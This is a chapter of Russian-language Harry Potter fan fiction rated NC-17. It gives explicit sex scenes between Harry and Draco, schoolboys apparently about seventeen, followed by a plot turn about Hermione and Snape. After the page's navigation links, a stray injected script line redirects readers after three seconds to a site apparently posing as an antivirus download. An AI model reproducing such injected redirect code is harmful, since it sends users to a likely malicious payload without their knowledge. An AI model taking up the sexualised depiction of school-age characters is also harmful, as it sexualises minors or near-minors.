Ничья земля

Автор: Umbridge
Пайринг: Гарри Поттер/Драко Малфой
Рейтинг: NC-17
Жанр: action/agnst/romance
Саммари: Добро пожаловать! Вас приветствует НИЧЬЯ ЗЕМЛЯ! Забудьте все, чем вы были раньше. Здесь нет власти, но есть правила. Соблюдайте их - и вы выиграете!
Предупреждение: гет в 10 и 11 главах. ГП/ДУ, ДМ/НЖП, АУ 7 книги

Глава 13. Возвращение.

(Глава, в которой приключения не заканчиваются, Гарри узнает неприятные подробности, а Драко вспоминает про план)

Комнату заливал свет, солнечные блики лежали повсюду: на полу, на столе, на темном стекле бутылок, на полированной крышке комода; пылинки искрились, дрейфуя в спертом воздухе номера. Ослепленный, Гарри нащупал очки на тумбочке и сел. Голова кружилась, сердце лихорадочно стучало в груди, как будто собиралось разорваться, во рту пересохло – таким было первое в жизни гриффиндорца похмелье. Медленно поднявшись, Гарри дошел до стола, плеснул сока в стакан и выпил залпом. Сердцебиение немного успокоилось, но теперь мальчика бросило в холодный пот. Гарри добрался до окна, раздвинул шторы и распахнул створки. Утро было сияющим. Свет пропитал листья росших вдоль тротуара кленов, просочился на траву, на глянцевую мостовую, по которой прогуливались празднично одетые горожане. Городской шум тут же хлынул на Гарри, и мальчик, облокотившись на подоконник, высунулся наружу, подставляя лицо теплому ветру. Пустынная вчера площадь превратилась в базар. Торговые ряды тянулись до фонтана, а мимо прилавков под пестрыми тентами ходили покупатели – со второго этажа были видны в полный рост только те, что проходили у ближайших к отелю лотков, а дальше – только шляпы, шляпки, непокрытые головы. Оставив окно открытым, Гарри выпрямился и вернулся в кровать. Забравшись под одеяло, он устроился на боку и уставился на белобрысый затылок Малфоя. Малфой лежал на животе, обняв подушку, подогнув одну ногу, и выглядел удивительно – Гарри никак не мог подобрать слово – доступным, что ли. Его волосы растрепались, открывая шею. Сколько раз Гарри представлял, как сжимает ее, как Малфой багровеет, хватает ртом воздух, хрипит, и вот, когда школьный враг беззащитен, все, чего хочет Гарри – целовать выступающие позвонки. Мальчик осторожно положил ладонь слизеринцу между лопаток и провел вниз по спине, оказавшейся на ощупь горячей, влажной и гладкой. Он облизнул губы и двинул руку дальше, проводя пальцами между ягодиц. Нащупав тугое отверстие, замер на секунду, словно засомневавшись на мгновенье, но потом слегка надавил. Указательный палец проник внутрь на удивление легко. Воодушевленный, Гарри перекатился и прижался к спине слизеринца.

Его вел почти животный инстинкт, и он не задумывался о том, что может причинить Малфою боль. Но тот вдруг повернулся, дотянулся до его губ и поцеловал, уже не торопливо, взволнованно и неловко, как тогда у казино, а медленно, долго и даже немного грубо, отчего последние связные мысли покинули голову гриффиндорца. На свете существовал только жаркий рот и настойчивый язык Малфоя. Когда поцелуй прервался, слизеринец начал резко подаваться навстречу его пальцам, шире разводя колени, а Гарри пытался сильнее прижаться пахом к его бедру и уже был готов прикрикнуть, лишь бы он хоть на секунду остановился.

- Поттер, нужна смазка, - после нескольких минут жаркой возни пробормотал Малфой, переворачиваясь на спину.

Гарри застыл, пытаясь собраться с мыслями.

- Что-нибудь скользкое… - хрипло добавил Драко.

- Ну… ладно, - Гарри спрыгнул с кровати. Все тело горело от нетерпения, и он ворвался в ванную, окинул взглядом длинный ряд флаконов, а затем открыл первый попавшийся. Там оказался шампунь. Чертыхнувшись, Гарри бросил его на пол и выхватил следующий флакон откуда-то из середины. На этот раз мальчику повезло, и он кинулся в комнату.

- Это крем? – спросил слизеринец поспешно.

- Крем… - устраиваясь между его коленей, пробормотал Гарри. Слизеринец отобрал у него банку и открыл ее.

- Давай, Поттер, я помогу тебе, - сказал Драко, и, откинувшись на подушку, зачерпнул белую мазь. Понаблюдав немного за тем, как пальцы слизеринца скользят между ягодиц, как меняется выражение его лица, Гарри не выдержал и, отодвинув его руку, сам продолжил начатое, расслабляя, проникая глубже, чувствуя, что желание становится болезненным, невыносимым, представляя, как он войдет в Драко, как горячо и тесно будет внутри. Наконец, прошептав что-то похожее на «давай», слизеринец потянул его на себя. Гарри подчинился, ложась сверху и пытаясь войти, и тут же услышал тихое: «Аккуратней».

- Прости, - торопливо прошептал он, позволяя Драко направить себя. Слизеринец закрыл глаза, подался вперед, впуская его, и теперь, кажется, все получилось как надо. Но стоило Гарри сделать несколько движений, как Малфой снова вскрикнул.

- Что? – выдохнул гриффиндорец и облизнул соленые от пота губы.

- Ничего, - раздраженно ответил Драко. - Это… не от боли.

Наклонившись, Гарри поцеловал его, а затем снова начал двигаться. Сначала медленно, осторожно, а потом все быстрее, резче, забываясь, отдаваясь страсти, которая казалась сейчас такой естественной, такой непохожей на неловкое желание и нежную влюбленность, которые Гарри испытывал к Джинни. Сейчас он забыл, что он – оружие против Волдеморта, забыл о своем предназначении, о своем неопределенном будущем, стал просто человеком, просто телом, горевшим, страждущим. Малфой стонал все громче, и это заводило еще сильнее, лишая последних остатков самоконтроля. Хотелось заставить его или заткнуться, или кричать в голос. Мучительно напряженное лицо слизеринца, его дыхание были так близко… А потом что-то накатило, словно внутри распрямилась пружина. Это не было похоже на забвение, не было похоже на обморок, скорее это напоминало судороги, и Гарри упал на слизеринца, по-прежнему чувствуя, как внутри того что-то сжималось, когда он вздрагивал в последних отголосках оргазма.

Охваченные истомой, они лежали, не шевелясь. Гарри не хотелось отпускать Малфоя, хотя тот был липким, а полуденное солнце уже припекало вовсю, и, несмотря на открытое окно, в комнате было душно. Гарри не открывал глаз, ему было лень даже поднять руку, чтобы вытереть мокрый лоб. Слизеринец гладил его спину, ладони бездумно блуждали по горячей коже, и он повернул голову, чтобы взглянуть на Драко. Но все расплывалось, и гриффиндорец вдруг понял, что успел снять очки, теперь придется вставать и искать их. Он сел на кровати. Драко тут же выпрямил ноги и посмотрел на него.

- Принеси сока, - попросил он.

- Ладно, - нашаривая на полу очки, отозвался Гарри. Они нашлись у тумбочки, и, надев их, гриффиндорец встал. Ступать по мягкому ковру голыми ступнями было приятно и слегка непривычно, и удовольствие от этого простого ощущения оказалось сейчас неожиданно ярким.

Напившись, Драко поставил стакан на ковер.

- Чем займемся? – спросил он, повернувшись к гриффиндорцу.

Гарри улыбнулся:

- Не знаю… Давай просто полежим.

Протянув руку, он коснулся мягких волос в паху Драко, и, взглянув на его пальцы, мальчик усмехнулся.

- Просто?

Ему не верилось, что это происходит на самом деле, когда Гарри вдруг наклонился и захватил губами его еще мягкую плоть.

- Поттер! – изумился слизеринец, не ожидавший такой ласки, наблюдая со смешанным чувством смущения и восхищения, как напрягаются смуглые худые плечи, как движется вверх-вниз темная вихрастая голова. Драко осторожно положил руку на затылок гриффиндорца. Гарри закрыл глаза. Он облизывал быстро затвердевший член слизеринца, с удовольствием, вдохновенно, охваченный желанием и любопытством. Малфой застонал, и от этого вожделение гриффиндорца стало почти нестерпимым, но помочь себе не было никакой возможности, и он продолжал, уже не так осторожно и медленно. В конце концов мальчик не выдержал.

- Повернись, - задыхаясь, проговорил он, и Драко повиновался, желая одного - снова почувствовать Поттера на себе и в себе. Сначала Драко почувствовал его пальцы, впрочем, подготовка была небрежной, и вот гриффиндорец уже двигался в резком, рваном ритме, а Драко ласкал себя, просунув руку между бедрами и матрасом, выгибаясь, сильнее подаваясь назад. Какое-то время он еще слышал пение птиц за окном, видел солнечные полосы на ковре, а потом все исчезло, осталось только наслаждение. Все прежние удовольствия были жалкой подделкой рядом с этим. Желание концентрировалось в нем, становилось гуще, острее, и в какой-то момент вспыхнуло, заставляя дергаться и ловить ртом воздух.

Гриффиндорец кончал долго, вскрикивая, входя в него глубже, до самого предела, так что Драко даже стало немного больно, а после упал на него, мокрый от пота. Какое-то время они целовались, а затем Гарри откинулся на подушку, устало улыбаясь.

- Может, выпьем? – предложил он, и слизеринец с готовностью кивнул.

- Ага. Только в ванную схожу.

Драко встал с кровати и ушел в ванную. Там еще пахло шампунем, которым он мыл голову вчера, и, распахнув шторы, слизеринец открыл окно. В залитом солнцем саду звонко пели птицы, и их пение заполнило комнату. Беззаботно улыбнувшись, слизеринец плавно потянулся - в теле ощущалась удивительная легкость. Включив кран, мальчик набрал в ладони воды и плеснул в пылающее лицо. Как странно. Еще несколько минут назад он был с Гарри, они обнимались, целовались, они были вместе, ближе не бывает, и все это так походило на сон, что у Драко кружилась голова. Он сел на край ванны, пытаясь прийти в себя и осознать произошедшее. Ветер хлопнул оконной рамой, занавеска взметнулась и медленно опала, похожая на широкий рукав женской мантии. Драко вздрогнул. Необъяснимая тревога охватила его, словно случилось что-то плохое, а он забыл об этом. Слизеринец встал и прикрыл окно, а затем повернул ручку душа, стараясь сосредоточиться на мытье и не думать о причине беспокойства.

Скоро он вышел, аккуратно причесанный, в идеально белом полотенце на бедрах, и уселся на кровать.

- Что будем пить?

- Хм, - Гарри поправил очки, - может, можно заказать… не знаю… в ресторане? Или там у коридорного.

Внезапно у кровати с громким хлопком появилась уже знакомая им портье. Она окинула мальчиков задумчивым взглядом, поднесла к губам сигарету и затянулась. Драко недовольно помахал рукой, отгоняя дым, и потянулся за простыней, а Гарри удивленно поднял брови, собираясь спросить, что она тут делает, но женщина заговорила первой.

- Что желаете?

- Вы, вообще-то, не вовремя, – гриффиндорец покраснел и прикрылся подушкой.

- Вы хотели выпить. Я к вашим услугам. Вина? Или, может, чего покрепче? – невозмутимо отозвалась портье.

- Хотели. Но нужно было дождаться заказа, - повысил голос Гарри.

- Успокойтесь. Сейчас будет вино, – ответила незваная гостья и исчезла, а на столе появилась пыльная темно-зеленая бутылка.

- Ну и сервис! – возмутился смущенно молчавший Драко.

- Хм… - только и ответил гриффиндорец, встав с кровати и хмуро рассматривая бутылку. Она была откупорена, и Гарри вернулся с ней в постель, не забыв захватить бокалы.

Он налил вина себе и Драко, наблюдая, как жидкость наполняет бокал.

- Отличное сухое вино, сразу видно, что старое. А ты знаешь, что старое вино пьянит сильнее молодого? – спросил Драко, попробовав.

- Нет. Почему? – лениво спросил Гарри, почесывая живот. Ему было хорошо, ему хотелось просто наслаждаться этим утром, а не думать о том, чем отличается старое вино от молодого, сухое от сладкого, достаточно и того, что вино было в его бокале.

- Поттер, молодое вино слегка вяжет, а со временем смягчается, и становится "гармоничным", или "сбалансированным", или "уравновешенным". Молодое вино - пурпурное, темно-рубиновое, гранатовое, вишневое или алое с фиолетовым… Зрелое и гармоничное - более светлое, и даже… слегка бежевое, а очень старое вино – коричневатое. Молодое вино - незрелое, легкое и свежее, – растягивая гласные, выдал Драко то, что когда-то урывками слышал от отца. Возможно, слизеринец что-то и перепутал, но его собеседник все равно в этом не разбирался.

Гарри выслушал, не совсем поняв, что к чему, а потом зевнул, прикрыв рот рукой.

- Есть хочешь? – спросил он у сделавшего паузу Малфоя. Тот сначала растерялся, а затем, немного обиженный тем, что его речь не вызвала должного интереса, кивнул:

- Ну давай.

Тогда Гарри встал, положил на тарелку помидоры, пару перцев, мясо и несколько треугольников сильно пахнущего сыра и вернулся в кровать.

- Нормандский камамбер? – Драко наклонился и взял кусок. Есть в постели было ужасным моветоном, но сейчас правила не имели никакого значения.

- Да? Вкусно пахнет, - равнодушно взглянув на сыр, ответил Гарри. Драко удивленно поднял брови. Запах этого сорта нравился не всем.

После завтрака от вина и от жары мальчики почувствовали себя совершенно разомлевшими. Поставив пустые бокалы на пол, они прижались друг к другу и снова начали целоваться. Гарри усадил слизеринца себе на бедра, и тот, еще горячий и расслабленный, легко впустил его, а затем начал подниматься и опускаться, отклонившись назад и упираясь рукой в матрас. Гарри смотрел на него, чувствуя, как постепенно голову заволакивает горячий туман, кровь стучит в висках, а каждая черта Малфоя: светлые соски, изогнутая шея, мокрые от пота волосы – отпечатывается в мозгу, отдается в паху болезненными спазмами. Драко начал двигаться все быстрее и быстрее, забываясь, переставая следить за тем, как он выглядит со стороны, и Гарри, не в силах больше сдерживаться, сжал его бока, стиснул зубы так, что заболела челюсть. Слизеринец сбился с ритма и громко застонал, но Гарри услышал это словно издалека. Жара, шум, отчаянный скрип пружин, удары изголовья о стену – ничто больше не отвлекало, он пересек линию необратимости, за которой значение имел только неизбежный конец. Гриффиндорец напряженно всматривался в порозовевшее лицо Малфоя, когда тот быстро толкался в кулак, а потом дернулся и стиснул его пальцы, и Гарри из последних сил пришлось прижать его бедра к своим, чтобы, наконец, кончить. Несколько секунд они еще двигались, стараясь собрать рассеивающееся удовольствие, а потом утомленно растянулись на кровати, обнявшись, и целовались, и в этих поцелуях была какая-то странная, пронзительная, ускользающая, невозможная нежность.

Когда вино закончилось, а от поцелуев уже распухли губы, Гарри вспомнил, что был в ванной только когда искал подходящую смазку. Не без сожаления высвободившись из крепких объятий слизеринца, он отправился в душ. Мальчик мылся долго, наслаждаясь приятной пустотой в голове, но, вернувшись в комнату, вдруг посмотрел на часы. Почему именно сейчас его дернуло посмотреть на них? Сейчас, когда он чувствовал себя таким довольным, когда все было так хорошо. Увиденное тут же вернуло его с небес на землю - маленькая стрелка приближалась к трем, а это означало, что пора идти дальше. Гарри сам точно не знал, почему он отвел на отдых именно столько времени – просто нужно продолжать путь, ведь еще не все ответы были найдены. Гарри бросил халат на кровать и посмотрел на слизеринца.

- Нам пора идти.

Драко уставился на него, не зная, что сказать. Он даже не думал о дороге, уверенный – они останутся здесь навсегда.

- Слушай, нам ведь некуда торопиться, - сказал слизеринец, чувствуя, как холодеют пальцы. - Да и вообще, разве нам тут плохо?

Гарри поднял брови.

- Да нет, нам-то прекрасно, но мне надо узнать все, ради чего я сюда попал, а потом вернуться.

И Драко вдруг вспомнил про свой маленький план.

- Поттер, - начал он, - а зачем вообще возвращаться? ТАМ тебя могут убить. А ТУТ у нас будет все, чего мы пожелаем.

Гарри прищурился.

- Малфой, я решил вернуться, и я вернусь, – слова слизеринца отчего-то разозлили его. - Без вариантов. Нам было хорошо… - Гарри запнулся, но потом продолжил, - очень хорошо, но это не отменяет того, ради чего я здесь.

- И ради чего? – спросил Драко, чувствуя непреодолимое желание задернуть шторы. – Ради кучки школьных приятелей? Ради своих родителей? Ради чего? Только не говори, что ради ВСЕГО МАГИЧЕСКОГО МИРА! Зачем этот пафос? Мы оба знаем, что ради такого никто и пальцем не шевельнет.

- Ты неправ. Но раз ты не понимаешь сам, бесполезно тебе объяснять, - разозлился Гарри, надевая рубашку. - Вставай, если не собираешься остаться тут один.

Драко быстро слез с кровати.

- Один? Почему ты не хочешь остаться со мной?

- Ты опять? – повысил голос Гарри.

- Да. Я просто не понимаю…

- Но тебе и не надо понимать, Малфой! Просто делай, как я сказал! Собирайся! – Гарри нахмурился и сел на кровать, чтобы зашнуровать ботинки.

- Не приказывай мне! Я тебе не твои друзья-приятели, – Драко пытался застегнуть чулки, но пальцы все время пропускали петлю. - Глупо, очень глупо. Можно жить в комфорте. Там, где полно еды, постель, безопасность… А ты хочешь умереть… - тут он поднял голову и посмотрел на гриффиндорца. - И я тоже могу… Ты хочешь, чтобы я умер?

- Малфой! - с досадой воскликнул Гарри. - Нет, я не хочу, чтобы ты умер, но мне надо вернуться, иначе погибнет слишком много людей! Да тебе не понять…. Тебя волнует только собственная жизнь. Ладно, - он махнул рукой, - хватит.

- Хорошо, - Драко наконец справился с чулками и надел мантию.

- Хорошо, - повторил он. - Ты думаешь, тебя там ждут… ждут верные друзья, чтобы помочь тебе справиться с твоей миссией, – он выпрямился и посмотрел на Гарри. - Так ты был на Астрономической башне, когда Снейп убил Дамблдора?

- Да, был, - резко ответил Гарри, не понимая к чему такие вопросы.

- А я кое-что вспомнил, - Драко провел рукой по волосам. Ладони были влажными, и он вытер их о мантию.

- И что же? – спросил Гарри хмуро, отвернувшись и разыскивая мешок.

- Кое-что о видениях в лабиринте. Помнишь, я говорил тебе про девушку, которой Снейп передал книгу?

- И? – Гарри выпрямился и повернулся к слизеринцу.

- Так я узнал ее. Это была твоя грязнокровка, - медленно проговорил Драко.

- Только что придумал? И сколько раз нужно повторять – не называй ее так, - бросил Гарри и снова наклонился к креслу в поисках мешка.

- Ты мне не веришь? – Драко подошел к нему. - Но я видел. И не сказал, чтобы не расстраивать тебя. Он дал ей книгу в обмен на что-то. Старую книгу.

- Ты видел эту книгу? – Гарри вытащил мешок и засунул его за пазуху. - Как она выглядела?

- Толстая, с коричневой обложкой и с таким золоченым язычком закладки. Остальное не рассмотрел, но…

Гарри резко обернулся и посмотрел на него.

- Золоченая закладка?

- Да. Длинная. Свисала, как змеиный язык.

- И надпись рунами на корешке? – спросил Гарри, стараясь не сорваться на крик.

- Да, рунами, - Драко самодовольно усмехнулся. - И она что-то пообещала за книгу.

- Что? – машинально спросил гриффиндорец.

- Не слышал, - пожал плечами Драко.

- Почему не сказал раньше?

- Говорю же, не хотел тебя расстраивать.

Гарри невидяще смотрел на него. «Гермиона и Снейп. Что она могла пообещать ему? Зачем она вообще поверила ему? Черт возьми! Как она могла!» - думал он, отворачиваясь от слизеринца и направляясь к двери.

- Поттер! – Драко поспешил за ним, лихорадочно придумывая, что еще можно сказать, чтобы задержать его. – Куда ты так спешишь? К кому? К людям, которые общаются с твоими врагами у тебя за спиной?

- Малфой, - внезапно остановился Гарри, - заткнись, ладно? – и, распахнув дверь, понесся по коридору. Только сейчас, глядя ему в спину и стараясь не отставать, Драко окончательно понял, как мало значил для Гарри Поттера секс с ним. Это было так очевидно, но все равно так больно, что заготовленная реплика застряла в горле, и слизеринец молча следовал за гриффиндорцем, сгорая от стыда и обиды.

Распахнув дверь, мальчики вышли из прохладного холла гостиницы, и раскаленный воздух окутал их. Казалось, жар шел отовсюду: от горячих камней мостовой, от яркой зеленой травы, от выбеленных стен. Гарри сдернул мантию, перекинул ее через руку и пошел в сторону бульвара по шумной, переполненной пестрым народом площади. Драко старался не отставать, но мантию он снять не мог и уже через минуту почувствовал, как струйки пота неприятно щекочут спину. Солнце слепило глаза, люди вокруг галдели, и хотелось заорать на них, растолкать, ударить кого-нибудь, перевернуть их лотки с дурацким дешевым товаром. Драко поднял руку и начал бездумно поглаживать шрам на губе. Это неожиданно отвлекло и успокоило, и мальчик почти перестал замечать происходившее вокруг, стараясь не смотреть на идущего впереди гриффиндорца, стараясь не думать о том, что тот снова оттолкнул его.

Ближе к окраине дома становились ниже и старее, а потом все чаще стали попадаться поросшие высокой травой и лопухами развалины: тут от дома осталась только труба, там – фундамент и балки, а там - стена. В спертом воздухе пахло разрушенным жилищем, и от этого запаха, густого и едкого, болела голова.

Драко было очень жарко, но он не закатывал рукава, не желая выставлять напоказ шрам. Он слизывал пот с верхней губы, чувствуя, как внутри поднимается ненависть к Поттеру с его одержимостью, с его нелепым бессмысленным героизмом, со всем тем, чем Драко в глубине души восхищался.

- Может, пойдешь помедленнее? – холодно бросил он, и гриффиндорец сбавил шаг.

- Извини.

Драко промолчал. Он хотел сказать какую-нибудь колкость, вроде «я понимаю, что ты очень спешишь избавиться от моего общества», но не стал, решив, что это будет слишком похоже на беспомощное вымогательство. Ведь в ответ Драко ждал бы уверений в том, что Поттер вовсе не спешит от него избавиться, и это было жалко.

Тем временем последние развалины остались позади, и мальчики вышли в поле. Здесь воздух пах травой и горячей, влажной землей, а справа, словно усыпанная бриллиантами, ослепительно сверкала поверхность реки.

- Поттер, дай воды! – раздраженно попросил Драко.

Гриффиндорец остановился и вытащил из-за пазухи мешок.

- Значит, ты уверен, что со Снейпом была Гермиона? – спросил Гарри, глядя на то, как Малфой пьет. Тот со стоном удовольствия выдохнул и вернул ему флягу.

- Да. Это была Грейнджер. Точно. Ее воронье гнездо, ее дребезжащий голос…

- Малфой…

- Но она заключила сделку с твоим врагом…. – Драко вдруг рассмеялся неприятным, горьким смехом. - А не из той ли книги она взяла заклинание, отправившее нас сюда? Ай да Снейп… Может, он хотел меня спасти, спрятав здесь?

- Бред. Я уверен, что она мне все объяснит, – пробормотал Гарри, пряча флягу обратно в мешок.

- Ну да, объяснит, а как же, – ядовито проговорил Драко. - Объяснит, почему связалась с убийцей стар… Дамблдора.

- Побольше уважения! – зло осадил его гриффиндорец.

- Да плевать! – Драко сложил руки на груди, и сразу почувствовал, как мокрая мантия липнет к телу. - Суть от этого не меняется.

- Ладно. Идем, – сухо сказал Гарри, отворачиваясь и направляясь через поле на запад. Впереди не было видно ни леса, ни гор, ни города, только трава, доходившая мальчикам до пояса. Однако чем дальше они шли, тем суровей делался пейзаж. Небо стало желтым, как умирающие стебли под ногами, а вскоре мальчики уже шагали по сухой растрескавшейся земле.

- Смотри! – вдруг воскликнул Драко и, обогнав гриффиндорца, склонился над каким-то белым предметом. Гарри подошел ближе и понял, что именно держит в руках слизеринец.

- Моя маска, - растерянно сказал Малфой и посмотрел на своего спутника так, словно ждал, что тот скажет, будто ему почудилось.

- Да, - Гарри неотрывно смотрел на белую маску. Он сразу понял, что это означает, и на душе стало тяжело.

- Получается, что мы вернулись туда, откуда пришли? – спросил Драко с надеждой, и гриффиндорец вдруг шагнул вперед и поцеловал его.

- Да. Надень маску, - сказал он, отстранившись.

- Но мы еще не все узнали…

- Да, – только и мог ответить Гарри.

- Тогда идем отсюда…

- Мы не сможем, - Гарри взял маску из рук слизеринца и надел ему на лицо. Земля ушла у них из под ног, а в глазах потемнело, словно выключили свет.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>